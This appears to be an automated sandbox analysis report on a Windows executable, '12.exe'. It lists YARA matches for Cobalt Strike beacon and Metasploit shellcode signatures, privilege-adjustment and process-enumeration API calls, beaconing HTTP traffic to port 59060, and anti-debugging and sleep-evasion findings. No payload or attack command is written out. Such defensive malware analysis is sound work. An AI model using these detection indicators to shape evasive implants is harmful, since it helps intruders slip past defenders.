                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB41CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00DB41CB
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB41CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00DB41CB
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB41CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00DB41CB
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB41CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00DB41CB
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBA4E3 _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,0_2_00DBA4E3
                    Source: 12.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\12.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 12.exeReversingLabs: Detection: 94%
                    Source: C:\Users\user\Desktop\12.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

                    Data Obfuscation

                    barindex
                    Yara detected ReflectiveLoader
                    Source: Yara matchFile source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB21D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00DB21D8
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DCB3E9 push ecx; ret 0_2_00DCB3FC
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DC85D0 push eax; ret 0_2_00DC85D7
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D8A7E9 push ecx; ret 0_2_00D8A7FC
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D88720 push dword ptr [ecx-75h]; iretd 0_2_00D88728
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D879D0 push eax; ret 0_2_00D879D7
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DCB3E9 push ecx; ret 0_2_00DCB3FC
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DDCBE1 push FFFFFFCBh; retf 0_2_00DDCBE5
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DC9320 push dword ptr [ecx-75h]; iretd 0_2_00DC9328
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DC85D0 push eax; ret 0_2_00DC85D7
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DE5D80 pushad ; retf 0_2_00DE5E79

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 59060

                    Malware Analysis System Evasion

                    barindex
                    Contains functionality to detect sleep reduction / modifications
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB36850_2_00DB3685
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB7E570_2_00DB7E57
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB36850_2_00DB3685
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB7E570_2_00DB7E57
                    Source: C:\Users\user\Desktop\12.exeWindow / User API: threadDelayed 1773Jump to behavior
                    Source: C:\Users\user\Desktop\12.exeWindow / User API: threadDelayed 8104Jump to behavior
                    Source: C:\Users\user\Desktop\12.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-40462
                    Source: C:\Users\user\Desktop\12.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-40142
                    Source: C:\Users\user\Desktop\12.exeAPI coverage: 7.5 %
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB7E570_2_00DB7E57
                    Source: C:\Users\user\Desktop\12.exe TID: 7328Thread sleep count: 1773 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\12.exe TID: 7328Thread sleep time: -17730000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\12.exe TID: 7340Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\12.exe TID: 7328Thread sleep count: 8104 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\12.exe TID: 7328Thread sleep time: -81040000s >= -30000sJump to behavior
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\12.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\12.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBA70E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00DBA70E
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB5225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00DB5225
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBA70E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00DBA70E
                    Source: C:\Users\user\Desktop\12.exeThread delayed: delay time: 60000Jump to behavior
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 12.exe, 00000000.00000002.4124793161.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\12.exeAPI call chain: ExitProcess graph end nodegraph_0-40316

                    Anti Debugging

                    barindex
                    Found potential dummy code loops (likely to delay analysis)
                    Source: C:\Users\user\Desktop\12.exeProcess Stats: CPU usage > 42% for more than 60s
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD9375 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,DebugBreak,0_2_00DD9375
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB21D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00DB21D8
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBB870 mov eax, dword ptr fs:[00000030h]0_2_00DBB870
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBABA0 mov eax, dword ptr fs:[00000030h]0_2_00DBABA0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D7AC70 mov eax, dword ptr fs:[00000030h]0_2_00D7AC70
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D79FA0 mov eax, dword ptr fs:[00000030h]0_2_00D79FA0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBB870 mov eax, dword ptr fs:[00000030h]0_2_00DBB870
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBABA0 mov eax, dword ptr fs:[00000030h]0_2_00DBABA0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB91C2 DeleteProcThreadAttributeList,GetProcessHeap,HeapFree,0_2_00DB91C2
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_0040116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0040116C
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00401A5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A5C
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00401A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A60
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00401160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,0_2_00401160
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_004013C1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,0_2_004013C1
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_004011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,0_2_004011A3
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD0331 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DD0331
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DCC4B2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DCC4B2
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD2950 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DD2950
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD2950 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DD2950
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD0331 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DD0331
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DCC4B2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DCC4B2

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
